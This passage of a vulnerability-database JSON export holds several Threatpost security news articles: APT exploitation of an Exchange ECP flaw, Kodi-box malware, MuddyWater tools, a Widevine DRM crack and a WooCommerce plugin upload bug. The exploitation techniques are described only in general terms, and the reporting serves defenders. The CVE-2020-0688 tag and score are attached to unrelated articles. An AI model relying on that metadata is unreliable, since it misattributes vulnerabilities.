said. They observed attackers leverage the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks post-exploitation.\n\n## The Flaw\n\nAfter Microsoft patched the flaw in February researchers with the Zero Day Initiative (ZDI), which first reported the vulnerability, [published further details](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) of the flaw and how it could be exploited. And, on March 4, Rapid7 published a module that incorporated the exploit into the Metasploit penetration testing framework.\n\nThe vulnerability exists in the Exchange Control Panel (ECP), a web-based management interface for administrators, introduced in Exchange Server 2010. Specifically, instead of having cryptographic keys that are randomly generated on a per-installation basis, all installations in the configuration of ECP have the same cryptographic key values. These cryptographic keys are used to provide security for ViewState (a server-side data that ASP.NET web applications store in serialized format on the client).\n\nAccording to ZDI, an attacker could exploit a vulnerable Exchange server if it was unpatched (before Feb. 11, 2020), if the ECP interface was accessible to the attacker, and if the attacker has a working credential allowing them to access the ECP. After accessing the ECP using compromised credentials, attackers can take advantage of the fixed cryptographic keys by tricking the server into deserializing maliciously crafted ViewState data, then allowing them to take over Exchange server.\n\n\u201cWe realized the severity of this bug when we purchased it,\u201d Brian Gorenc, director of vulnerability research and head of Trend Micro\u2019s ZDI program told Threatpost via email. \u201cThat\u2019s why we worked with Microsoft to get it patched through coordinated disclosure, and it\u2019s why we provided defenders detailed information about it through our blog. We felt Exchange administrators should treat this as a Critical patch rather than Important as labelled by Microsoft. We encourage everyone to apply the patch as soon as possible to protect themselves from this vulnerability.\u201d\n\n## Brute Force\n\nResearchers said, while an attacker would need a credential to leverage the exploit, the credential does not need to be highly privileged or even have ECP access.\n\nAfter technical details of the flaw were disclosed, researchers said they observed multiple APT groups attempting to brute force credentials by leveraging Exchange Web Services (EWS), which they said was likely an effort to exploit this vulnerability.\n\n\u201cWhile brute-forcing credentials is a common occurrence, the frequency and intensity of attacks at certain organizations has increased dramatically following the vulnerability disclosure,\u201d researchers said.\n\nResearchers said they believe these efforts to be sourced from \u201cknown APT groups\u201d due to the overlap of their IP addresses from other, previous attacks. Also, in some cases, the credentials used were tied to previous breaches by the APT groups.\n\n## Going Forward\n\nIn the coming months, Adair told Threatpost he suspects there could easily be hundreds of organizations being hit with this exploit.\n\n\u201cFrom our perspective the successful attacks we have seen are just a handful of different servers and organizations,\u201d Adair said. \u201cHowever, I would expect that attackers have been access compromised credentials all around the world and are not able to make better use of them.\u201d** **\n\nResearchers encourage organizations to ensure that they\u2019re up to date on security updates from Microsoft, as well as place access control list (ACL) restrictions on the ECP virtual directory or via any web application firewall capability. Firms should also continue to expire passwords and require users to update passwords periodically, researchers said.\n\n\u201cThis vulnerability underscores such a case where an organization can be locked down, have properly deployed 2FA, and still have an incident due to outdated or weak password,\u201d said researchers.\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Hacks](<https://threatpost.com/category/hacks/>)\n", "cvss3": {}, "published": "2020-03-09T18:01:41", "type": "threatpost", "title": "Microsoft Exchange Server Flaw Exploited in APT Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2020-03-09T18:01:41", "id": "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "href": "https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-exchange-server-flaw-exploited-in-apt-attacks", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:57", "description": "You get what you pay for when you pirate content. That\u2019s the takeaway from the latest report by Digital Citizens Alliance.\n\nIt found that pirating hardware, which enables free streaming copyright-protected content, comes packed with malicious malware. The devices give criminals easy access to router settings, can plant malware on shared network devices and are often leveraged to steal user credentials.\n\nAccording to the [Digital Citizens Alliance report](<https://www.digitalcitizensalliance.org/clientuploads/directory/Reports/DCA_Fishing_in_the_Piracy_Stream_v6.pdf>) (PDF), 13 percent of 2,073 Americans surveyed use a hardware device for pirating content. One such popular device is called a \u201cKodi box,\u201d which is sold for between $70 to $100 on grey markets. Kodi is an open-source media player designed for televisions and developed by the XBMC Foundation. The software is widely known for its support of a bevy of copyright-infringing apps that offer free access to premium content from Netfix, Amazon Prime, Hulu, sports networks and paid subscription music services. \n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cBy plugging the device into a home network, [users] are enabling hackers to bypass the security (such as a router\u2019s firewall) designed to protect their system. If apps on the box or that are later downloaded have malware, the user has helped the hacker past network security,\u201d wrote Digital Citizens Alliance (DCA) in a recently released report.\n\nIn a review of hardware and pirating apps, such as FreeNetflix, researchers said they found malware piggybacking on illegal apps and preloaded with content. For example, when researchers installed a live sports streaming app called Mobdro, the app forwarded the researcher\u2019s Wi-Fi network name and password to a server in Indonesia.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29154055/Jailbroken-Firestick-image.png>)\n\nExample of a jail broken Amazon Fire TV Stick for sale. Courtesy: Digital Citizens Alliance\n\nIn other instances, 1.5 terabytes of data was uploaded from a device that shared the same network of the Kodi box. And, in yet another instance, \u201cresearchers uncovered a clever scheme that enabled criminals to pose as well-known streaming sites, such as Netflix, to facilitate illegal access to a legitimate subscription of an actual Netflix subscriber,\u201d according to the report.\n\nFor its investigation DCA partnered with GroupSense, a security firm that specializes in chatrooms that facilitate black market sales. It claims hackers were discussing how to leverage networks compromised by illicit media streaming services in hopes of recruiting them into DDoS botnets or to mine cryptocurrency.\n\n\u201cGiven that users rarely install anti-virus tools on such devices, the opportunities for exploitation are numerous,\u201d wrote researchers.\n\nThe unsavory worlds of [pirated content and malware are no strangers](<https://threatpost.com/searches-for-pirated-content-lead-to-pain-and-little-gain/113515/>). Researchers have [long warned that patronizing such](<https://threatpost.com/passteal-malware-lurking-file-sharing-sites-112112/77239/>) services is a shortcut to infection. Earlier this month, [Kaspersky Lab released a report](<https://threatpost.com/game-of-thrones-malware-piracy/143318/>) that found that illegal downloads of HBO\u2019s Game of Thrones accounted for 17 percent of all infected pirated content in the last year.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29154327/Firestick-Apps.png>)\n\nExamples of apps running on the Kodi platform.\n\nIn [Aug. 2018 researchers at ESET](<https://www.welivesecurity.com/2018/09/13/kodi-add-ons-launch-cryptomining-campaign/>) said they found DDoS modules had been added to a Kodi third-party add-on. ESET said it also found copyright-infringing apps that came with multi-stage crypto-mining malware that targeted Windows and Linux systems.\n\nAs part of its report, DCA reached out to XBMC Foundation. XBMC quickly rebuffed any notion it tacitly supported or endorsed pirated content. \u201cIf you are selling a box on your website designed to trick users into thinking broken add-ons come from us and work perfectly, so you can make a buck, we\u2019re going to do everything we can to stop you,\u201d it told DCA.\n\nThe Kodi application typically runs on a wide range of hardware and is sold by independent resellers on eBay, Facebook Marketplace and Craigslist. DCA said it also found Kodi pre-installed on a number of devices including inexpensive China-made media streamers. The software can also be found on devices, that were sold pre-sideloaded with Kodi software. Users can also choose to install the Kodi application on existing hardware.\n\nTo be clear, the Kodi software is not illicit. Rather, researchers are concerned the Kodi platform supports pirating apps that can harbor malware. Researchers are also concerned that some hardware devices that are sold as \u201cKodi boxes\u201d come pre-installed with malicious code and apps used to pirate streaming content.\n\nDCA did its own independent testing over the course of 500 hours of lab testing. It estimates there are 12 million active users of the illicit devices in North American homes. Those users \u201cpresent a tempting target because they offer hackers a new avenue to exploit consumers and a path to reach other devices on a home network. The findings should serve as a wake-up call for consumers, the technology community, and policymakers to take the threat seriously,\u201d it said.\n", "cvss3": {}, "published": "2019-04-29T20:31:30", "type": "threatpost", "title": "Malware Infests Popular Pirate Streaming Hardware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-29T20:31:30", "id": "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "href": "https://threatpost.com/kodi_box_malware/144191/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:59", "description": "An array of customized attack tools are helping the MuddyWater advanced persistent threat (APT) group to successfully exfiltrate data from its governmental and telco targets in the Middle East; an analysis of this toolset reveals a moderately sophisticated threat actor at work \u2013 with the potential to get even more dangerous over time.\n\nAn analysis from Kaspersky Lab released Monday shows that post-infection, the gang reaches for multiple, relatively simple and expendable tools to infiltrate victims and exfiltrate data, mostly using Python and PowerShell-based coding. The arsenal includes download/execute tools and remote access trojans (RATs) written in C# and Python; SSH Python scripts; and multiple Python tools for the extraction of credentials, history and more.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nKaspersky Lab also found that the group uses various deception techniques to derail detection efforts, such as Chinese strings, Russian strings and an impersonation of a completely different hacking group known as RXR Saudi Arabia.\n\n## A Battalion of RATs and More\n\nSome of MuddyWater\u2019s tools include proprietary efforts such as Nihay, a C# download-and-execute tool. It downloads a PowerShell one-liner from a hardcoded URL, researchers found. Like the other malicious code offerings from MuddyWater, this is a straightforward and simple malware that has but a single job.\n\nAnother tool that the researchers observed is a C# RAT called LisfonService. It \u201crandomly chooses a URL from a huge array of hardcoded proxy URLs hiding the real C2 server,\u201d according to [the analysis](<https://securelist.com/muddywaters-arsenal/90659/>), and is tasked with registering a victim with the C2 by collecting the user name, domain or workgroup name, machine name, machine internal IP address, OS version, OS build and public IP address. This information is used later to request commands from the C2, such as executing PowerShell code or crashing the system.\n\nAnother RAT called Client.Py is a Python 3.6 RAT is a bit more advanced; it supports basic keylogger functionality, stealing passwords saved in Chrome, killing task manager, remote command-execution and displaying an alert message for the victim in a message box.\n\nWhile most of the tools that MuddyWater uses are custom-developed, there are a handful that are based on more generic and publicly available ones, researchers added.\n\n## Deception\n\nAppropriately given the APT\u2019s name, one of the ways that MuddyWater throws forensics off the trail of attribution is by planting false flags, the analysis shows \u2013 including the incorporation of different languages into the coding.\n\n\u201cMultiple Chinese strings can be found in some PowerShell RAT payloads (such as Ffb8ea0347a3af3dd2ab1b4e5a1be18a) that seem to have been left in on purpose, probably to make attribution harder,\u201d according to Kaspersky Lab.\n\nThis also holds true for a series of Russian words that researchers found in another PowerShell sample.\n\n\u201cAttackers used Russian words as the RC4 key when establishing a connection to the C2 server,\u201d the team noted. It added, \u201cInterestingly, when visiting the C2, it displays a blank webpage whose HTML source code shows a strange HTML tag value that suggests attackers have tried to impersonate a Saudi hacking group called RXR Saudi Arabia.\u201d\n\nIn all, the MuddyWater APT shows the hallmarks of being a moderately sophisticated threat group that has built up a reasonably advanced armory to carry out their efforts. Lately those efforts have included attacks on government and telco targets in Bahrain, Iraq, Jordan, Lebanon, Saudi Arabia and Turkey, as well as a few other countries in nearby regions (Afghanistan, Azerbaijan and Pakistan), researchers said.\n\n\u201cThese tools\u2026seem to allow them flexibility to adapt and customize the toolset for victims,\u201d according to Kaspersky Lab. \u201cThis continuous capability to steadily adjust and enhance attacks, adapting well to the changing [Middle Eastern geopolitical scene](<https://threatpost.com/new-actor-darkhydrus-targets-middle-east-with-open-source-phishing/134871/>), seems to make this actor a solid adversary that keeps growing. We expect it to keep developing or acquiring additional tools and abilities, possibly including zero-days.\u201d\n", "cvss3": {}, "published": "2019-04-29T20:04:33", "type": "threatpost", "title": "MuddyWater APT Hones an Arsenal of Custom Tools", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-29T20:04:33", "id": "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "href": "https://threatpost.com/muddywater-apt-custom-tools/144193/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T22:23:40", "description": "Samsung has reportedly started rolling out a software patch for the Galaxy S10 and Note10, addressing glitches in both phone models that allow the bypass of their built-in fingerprint authentication sensors.\n\nThe fix comes after Samsung admitted last week that anyone [can bypass the Galaxy S10 fingerprint sensor](<https://threatpost.com/galaxy-s10-fingerprint-sensor-thwarted-with-screen-protector-report/149197/>) if a third-party silicon case is enclosing the phone. The acknowledgement led to widespread backlash from customers, while several U.K.-based banks have also started blacklisting impacted Samsung devices for their apps, as the issue also allowed users to access various apps on the impacted devices that were using the biometric function for authentication.\n\nAccording to a Wednesday [report by Android Police](<https://www.androidpolice.com/2019/10/23/samsung-will-begin-patching-fingerprint-scanner-security-flaw-within-24-hours/>), Samsung is now rolling out patches to customers, urging its customers support app (Samsung Members) to update their phones to the latest software version, which will fix the biometric authentication glitch.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cSamsung is releasing a software patch to fix fingerprint issues on Galaxy Note10, Note10+, S10, S10+, and S10 5G devices,\u201d Samsung said on a [note on Samsung Members](<https://www.androidpolice.com/2019/10/23/samsung-will-begin-patching-fingerprint-scanner-security-flaw-within-24-hours/#ap-lightbox>). \u201cIf you have registered a fingerprint on one of these devices, you will receive a notification with instructions. This update is being sent out gradually, so you may not receive the notification immediately.\u201d\n\nSamsung Galaxy S10 and Note10 users, for their part, are urged to look out for an update notification on their devices called \u201cBiometrics Update.\u201d Once they click on \u201cUpdate,\u201d they will be instructed to delete all previously registered fingerprints from their phone with covers on the phone, and re-register them without a cover applied to the phone.\n\nThe issue first came to light after a woman alleged that a $3 smartphone screen protector allowed unauthorized users to dupe her Samsung Galaxy S10\u2019s fingerprint recognition sensor \u2013 giving access to her phone and banking apps. The U.K. woman, Lisa Neilson, told media reports earlier in October that only her fingerprint was registered on her new Galaxy S10. However, after buying a third-party screen protector off eBay, Neilson\u2019s husband was able to unlock her phone using his fingerprint \u2013 even though it wasn\u2019t registered on the device. Worse, the pair found that Neilson\u2019s husband could log into her phone and access various private apps using the fingerprint biometrics security feature.\n\n\u201cThis issue involved ultrasonic fingerprint sensors unlocking devices after recognizing 3-dimensional patterns appearing on certain silicone screen protecting cases as users\u2019 fingerprints,\u201d said Samsung in a [press release last week](<https://news.samsung.com/global/statement-on-fingerprint-recognition-issue>). \u201cTo prevent any further issues, we advise that Galaxy Note10/10+ and S10/S10+/S10 5G users who use such covers to remove the cover, delete all previous fingerprints and newly register their fingerprints.\u201d\n\nOn the heels of this report, several videos popped up of Galaxy S10 users trying the trick out successfully on their own phones (one such video is below).\n\n[NatWest](<https://twitter.com/NatWest_Help/status/1186676299743580161>) and [Royal Bank](<https://twitter.com/RBS_Help/status/1186553506251071493>) are among the banks that removed their apps from the Google Play store for customers with Samsung Galaxy S10 and Note 10 devices: \u201cThis is due to reports that there are security concerns regarding these devices,\u201d according to a Royal Bank tweet. \u201cWe hope to have our app available again shortly once the issue has been resolved.\u201d\n\n> Hi there Martyn. We've removed the app from the Play Store for customers with Samsung S10 devices. This is due to reports that there are security concerns regarding these devices. We hope to have our app available again shortly once the issue has been resolved. WL\n> \n> \u2014 Royal Bank (@RBS_Help) [October 22, 2019](<https://twitter.com/RBS_Help/status/1186553506251071493?ref_src=twsrc%5Etfw>)\n\nThe utilization of biometrics on smartphones has been helpful for identity authentication \u2013 but it\u2019s not foolproof.\n\nIn fact, also in October Google [came under fire for its Pixel 4](<https://arstechnica.com/gadgets/2019/10/google-says-a-fix-for-pixel-4-face-unlock-is-months-away/>) facial recognition unlock feature, which users said would unlock for users even if their eyes were closed. Google issued a media statement this weekend that the glitch will be fixed in a software update that will be delivered in the \u201ccoming months.\u201d\n\nOther privacy incidents have plagued smartphone vendors around biometric authentication. [In August](<https://threatpost.com/researchers-bypass-apple-faceid-using-biometrics-achilles-heel/147109/>), researchers revealed vulnerabilities in the authentication process of biometrics technology that could allow bad actors to bypass various facial recognition applications \u2013 including Apple\u2019s FaceID. In 2018, a design flaw affecting all in-display fingerprint sensors \u2013 that left over a half-dozen cellphone models vulnerable to a trivial lock-screen bypass attack \u2013 [was quietly patched](<https://threatpost.com/lock-screen-bypass-bug-quietly-patched-in-handsets/139141/>). The flaw was tied to a bug in the popular in-display fingerprint reader technology used for user authentication. New vulnerabilities in [voice authentication](<https://threatpost.com/black-hat-2018-voice-authentication-is-broken-researchers-say/134926/>) have been uncovered as well.\n", "cvss3": {}, "published": "2019-10-24T15:44:50", "type": "threatpost", "title": "Samsung Rolls Out Fix For Galaxy S10 Fingerprint Sensor Glitch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-10-24T15:44:50", "id": "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "href": "https://threatpost.com/samsung-fix-galaxy-s10-fingerprint-sensor/149510/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:54", "description": "Researchers have used a proof-of-concept (PoC) side-channel attack to download an unencrypted raw file for Netflix\u2019 Stranger Things, in a format that\u2019s ready to distribute out to any buyer on the internet.\n\nThis pirate\u2019s booty is the result of breaking open the widely deployed digital rights management (DRM) to framework known as Widevine, the DRM engine behind Netflix, Hulu and Amazon Prime, among others.\n\nBy way of background, Widevine is an encryption method developed by Google but offered royalty-free to content creators and streaming services. According to Google stats, about 5 billion devices out there support it, and 82 billion content licenses are issued quarterly. In other words, it\u2019s a Big Kahuna when it comes to anti-piracy approaches \u2013 rivaled only by Apple\u2019s FairPlay and Microsoft\u2019s PlayReady DRM schemes.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWidevine\u2019s end-to-end approach to encrypting copyrighted content and [preventing piracy](<https://threatpost.com/kodi_box_malware/144191/>) is actually quite secure, according to researchers at Fidus Information Security, who developed the PoC. But a vulnerability exists in Level 3 of the framework that opens the door to side-channel attacks.\n\n## The Widevine Approach\n\nTo keep pirates from streaming or downloading content that they shouldn\u2019t (both for personal or resale purposes), Widevine uses a combination of hardware security and an isolated secure operating system (OS).\n\nAs it explains in its [documentation](<https://www.widevine.com/>), Widevine offers three levels of content protection: 1, 2 and 3. Level 1 is the most secure, where all content processing and cryptography operations are handled inside a Trusted Execution Environment (TEE); and, Widevine is incorporated into a display via a secured path like HDCP. This is the case with most modern Android devices.\n\nIn Level 2, Widevine is used within a TEE to decrypt a stream, which is then sent to the display in an unprotected format.\n\nAnd in Level 3, which Fidus researchers were able to crack, Widevine is used to decrypt streams using the device\u2019s CPU rather than inside the secure TEE, after which the decrypted stream is sent to the display unprotected. The Chrome and Firefox browsers use Level 3, for instance.\n\nThe capabilities of the user\u2019s playback device and the quality of the content determines which level of protection is applied. Level 3 is used mainly for non-HD streams, 720p and below, and low-resolution audio \u2013 content that would be delivered over spotty broadband to a desktop or laptop (which is why browsers support Level 3) or to less sophisticated, low-cost, non-HD devices that lack TEEs, which are [actually found in volume](<https://www.androidauthority.com/oneplus-5t-review-814075/>) in many areas of the world, like China. Some mobile devices also [block HD streams](<https://www.digit.in/features/mobile-phones/poco-f1-is-not-the-only-smartphone-to-block-hd-streaming-no-xiaomi-device-can-stream-netflix-in-hd-43339.html>) because of wireless carrier restrictions.\n\nIn all cases, \u201cthrough the design of the Widevine framework, the keys that have been used to encrypt the content are never actually exposed directly to the user,\u201d explained the firm, in a [Monday posting](<https://fidusinfosec.com/breaking-content-protection-on-streaming-websites/>) on the PoC. \u201cInstead, the header file that gets sent to the client when a stream is started contains the bare minimum information needed, containing just some metadata about the encryption scheme used.\u201d\n\nThat metadata then gets passed to the content decryption module (CDM), which is contained in the client or browser that the user has installed. The CDM handles getting the license keys from the Widevine license server, before the content is decrypted and displayed, using Arxan to obfuscate the communication with the server. The license server then sends back a license to the client, which contains the content keys. These content keys are then used by the CDM to decrypt the content, which the user can then view.\n\nHowever, using a new variant of a piracy method [uncovered by researcher David Buchanan](<https://twitter.com/David3141593/status/1080606827384131590>) in January, the Fidus researchers were able to board the Netflix ship, as it were, and plunder its premium content by plucking the keys out of this process.\n\n## Breaking Widevine L3\n\n\u201cIt was possible to download a raw file of Stranger Things from Netflix and fully remove the content protection enabled; allowing for illegal distribution of the material,\u201d Fidus researchers noted.\n\nIt should be noted that the issue lies with Widevine, and that Netflix is just one of many Widevine users susceptible to such an attack, the researchers said.\n\nFidus team said that they won\u2019t be publishing the PoC code or further details given that the repercussions could be significant. In January, Buchanan was similarly cagey about his own Widevine-cracking, but did say that it was \u201cscarily trivial to pull off,\u201d and that he used the [Side-Channel Marvels](<https://github.com/SideChannelMarvels>) project during \u201ca few evenings of work\u201d to do so.\n\n\u201cTheir Whitebox AES-128 implementation is vulnerable to the well-studied DFA attack, which can be used to recover the original key. Then you can decrypt the MPEG-CENC streams with plain old ffmpeg,\u201d he tweeted at the time, referring to differential fault analysis (DFA), more on which [can be found here](<https://blog.quarkslab.com/differential-fault-analysis-on-white-box-aes-implementations.html>).\n\nHe also said that while Google acknowledged the issue, there\u2019s not much to be done:\n\n> DRM is flawed by design. I do not consider this a bug, and it cannot be fixed.\n> \n> \u2014 D\u0430v\u0456d \u0412uc\u04bb\u0430n\u0430n (@David3141593) [January 3, 2019](<https://twitter.com/David3141593/status/1080618940689252352?ref_src=twsrc%5Etfw>)\n\nFidus intimated that it was working on breaking Widevine L1 and L2 \u2013 which \u201cWith Level 3 down, there\u2019s two to go.\u201d These, if cracked, would be a much bigger problem for Widevine and those that rely upon it, opening the door to pirating the higher-value HD content.\n\nThreatpost has reached out to Fidus for more details and will update this post for any new information.\n\nGoogle did not immediately return a request for comment.\n\n** **\n", "cvss3": {}, "published": "2019-04-30T16:28:34", "type": "threatpost", "title": "Researchers Compromise Netflix Content in Widevine DRM Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-30T16:28:34", "id": "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "href": "https://threatpost.com/netflix-compromised-widevine-drm-hack/144220/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:08", "description": "UPDATE\n\nA vulnerability in a popular WordPress plugin called the WooCommerce Checkout Manager extension is potentially putting more than 60,000 websites at risk, researchers say.\n\nThe WooCommerce Checkout Manager plugin allows WooCommerce users to customize and manage the fields on their checkout pages. The plugin, owned by Visser Labs, is separate from the WooCommerce plugin, which is owned by Automattic.\n\nAs of Monday, an update for WooCommerce Checkout Manager is available (version 4.3) that patches the vulnerability. That can be downloaded [here](<https://wordpress.org/support/topic/upgrade-to-4-3/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cEarlier this week, an arbitrary file upload vulnerability has been found in popular WordPress plugin WooCommerce Checkout Manager which extends the functionality of well known WooCommerce plugin,\u201d said Luka Sikic, with WebArx Security in a [Thursday post](<https://www.webarxsecurity.com/woocommerce-checkout-manager/>).\n\nVisser Labs has not responded to a request for comment from Threatpost. On Friday, the plugin has been removed from the WordPress plugin repository. \u201cThis plugin was closed on April 26, 2019 and is no longer available for download,\u201d according to a [notice](<https://wordpress.org/plugins/woocommerce-checkout-manager/>) on the site. However, that still leaves the 60,000 websites who have already downloaded and are utilizing the plugin open to attack, according to researchers.\n\nOn Tuesday, Plugin Vulnerabilities published a proof of concept outlining an attack on an arbitrary file upload vulnerability in WooCommerce Checkout Manager. The disclosed vulnerability exists because the plugin\u2019s \u201cCategorize Uploaded Files\u201d option does not check privileges or permissions before files are uploaded. As a result, bad actors could upload \u2013 and then execute \u2013 malicious files.\n\n\u201cSince there is no privilege or permission check before uploading a file, the exploitation of the vulnerability in WooCommerce Checkout Manager is simple and doesn\u2019t require an attacker to be registered on the site,\u201d Sikic said.\n\nThe number of vulnerable plugins being exploited in a massive campaign is racking up, with the WooCommerce Checkout Manager the latest plugin to be exploited.\n\nThe WooCommerce Checkout Manager is only the latest plugin to have a disclosed vulnerability, researchers say.\n\n\u201cWe continue to see an increase in the number of plugins attacked as part of a campaign that\u2019s been active for quite a long time,\u201d according to John Castro with Sucuri in a recent [post](<https://blog.sucuri.net/2019/04/plugins-added-to-malicious-campaign.html>). \u201cBad actors have added more vulnerable plugins to inject similar malicious scripts.\u201d\n\nOther plugins recently added to the attack include WP Inventory Manager and Woocommerce User Email Verification. That\u2019s on top of others, including Social Warfare, [Yellow Pencil Visual Theme Customizer](<https://threatpost.com/wordpress-yellow-pencil-plugin-exploited/143729/>), and [Yuzo Related Posts](<https://threatpost.com/wordpress-urges-users-to-uninstall-yuzo-plugin-after-flaw-exploited/143710/>).\n\nResearchers urged plugin users to disable the plugin completely or disable the \u201cCategorize Uploaded Files\u201d option on the plugin settings page.\n\n\u201cAttackers are trying to exploit vulnerable versions of these plugins,\u201d said Castro. \u201cPublic exploits already exist for all of the components listed above, and we highly encourage you to keep your software up to date to prevent any infection.\u201d\n\n_This article was updated on April 30 at 8 a.m. ET to reflect that the vulnerability has now been patched._\n", "cvss3": {}, "published": "2019-04-26T19:44:55", "type": "threatpost", "title": "Users Urged to Update WordPress Plugin After Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-26T19:44:55", "id": "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "href": "https://threatpost.com/users-urged-to-disable-wordpress-plugin-after-unpatched-flaw-disclosed/144159/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:21", "description": "Employees at Amazon can access geolocation information for Alexa users, according to reports \u2013 thus uncovering their home addresses and even satellite pictures of their houses generated from a service such as Google Earth.\n\nAlexa is the built-in voice assistant shipped with devices like Amazon Echo, Amazon Dot, Fire TV and some third-party gadgets. Confidential employee sources speaking to Bloomberg said that the global team that manually audits Alexa\u2019s accuracy in understanding voice commands can \u201ceasily find\u201d a customer\u2019s home address, by combining the GPS coordinates that they have access to with public mapping services.\n\nThis division, known as the Alexa Data Services Team, is tasked with listening to random samplings of voice commands \u2013 and then matching up Alexa\u2019s response to them to see if the voice-recognition technology is working the way that it should. In theory this is anonymized, but location information in the form of GPS coordinates is captured in order to provide localized search results. For instance, if a user asks for the weather forecast, or a review for a restaurant, the geolocation data is necessary to carry out the requests.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nFive Amazon employees [confirmed to Bloomberg](<https://www.bloomberg.com/news/articles/2019-04-24/amazon-s-alexa-reviewers-can-access-customers-home-addresses>) that the division has access to the location data, and two members of the Alexa team said that they felt they have been given \u201cunnecessarily broad access\u201d to personal information.\n\nThey also shared a demo, demonstrating that by plugging in longitude and latitude of a device to Bing Maps or Google Maps, it\u2019s possible to bring up an address and even an image of the Alexa-owner\u2019s house.\n\n\u201cOften an individual piece of data might be innocuous, but the connected-ness of the world today means that no data can be viewed in a vacuum,\u201d Tim Erlin, vice president of product management and strategy at Tripwire, told Threatpost. \u201cGPS coordinates aren\u2019t personally identifiable on their own, but when coupled with a freely accessible system that translates them into an image of that location, they certainly are.\u201d\n\nFor its part, Amazon downplayed the issue.\n\n\u201cAccess to internal tools is highly controlled, and is only granted to a limited number of employees who require these tools to train and improve the service by processing an extremely small sample of interactions,\u201d Amazon said in a statement to media. \u201cOur policies strictly prohibit employee access to or use of customer data for any other reason, and we have a zero-tolerance policy for abuse of our systems. We regularly audit employee access to internal tools and limit access whenever and wherever possible.\u201d\n\nIt\u2019s unclear how many employees have access to the information, but the sources said that the Data Services Team numbers in the \u201cthousands of employees and contractors,\u201d located in Boston, India and Romania.\n\nThe employees also said that there is a second internal Amazon Alexa team for \u201cannotators and verifiers,\u201d who are privy to the information that customers input into the Alexa app when setting up a device. That includes home and work addresses, phone numbers, and any entered contact names, numbers and email addresses. This smaller team is responsible for making sure that Alexa correctly identifies contacts when someone asks her to \u201ccall my mom,\u201d for example.\n\nAll of that said, Amazon appears to have restricted some data access in the wake of a previous Bloomberg report revealing the existence of the Alexa Data Services Team, the outlet said.\n\nNot everyone is concerned about the news.\n\n\u201cThis is overblown. There is no reason to doubt that Amazon is sincere in its claim that only a select few employees have access to consumers\u2019 information and use it in order to perform their job,\u201d said Mike Bittner, manager for Digital Security and Operations at The Media Trust, via email.\n\n\u201cFeatures referenced in the article (suggested restaurants, etc.) require geolocation tracking, suggested products and targeted advertising require purchase and browser/cookie tracking, daily reminders require calendar tracking. All of these features are products of the continued trailing, recording and analysis of user behavior and undoubtedly make the smart home a more convenient tool,\u201d wrote Bittner.\n\nThus, the situation once again brings up the thorny issue of balancing consumer benefit with potential privacy abuse. It makes sense for Amazon to audit how well Alexa is performing \u2013 but is a flawless Alexa experience worth the data exposure for consumers?\n\n\u201cAmazon employees listening to private conversations recorded by Alexa speaks to the very fears that many of us have about smart-home devices,\u201d Harold Li, vice president at ExpressVPN, told Threatpost in an interview. \u201cThese revelations will no doubt make consumers think twice before buying, as our research has shown that privacy concerns and brand trust are crucial in the smart home space.\u201d\n\nHe added, \u201cIt\u2019s more than reasonable for consumers to expect that companies like Amazon do not invade the sanctity of private conversations in their own homes, and we should demand that companies respect that.\u201d\n", "cvss3": {}, "published": "2019-04-25T15:55:18", "type": "threatpost", "title": "Amazon Employees Given 'Broad Access' to Personal Alexa Info", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-25T15:55:18", "id": "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "href": "https://threatpost.com/amazon-employees-personal-alexa/144119/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T12:00:27", "description": 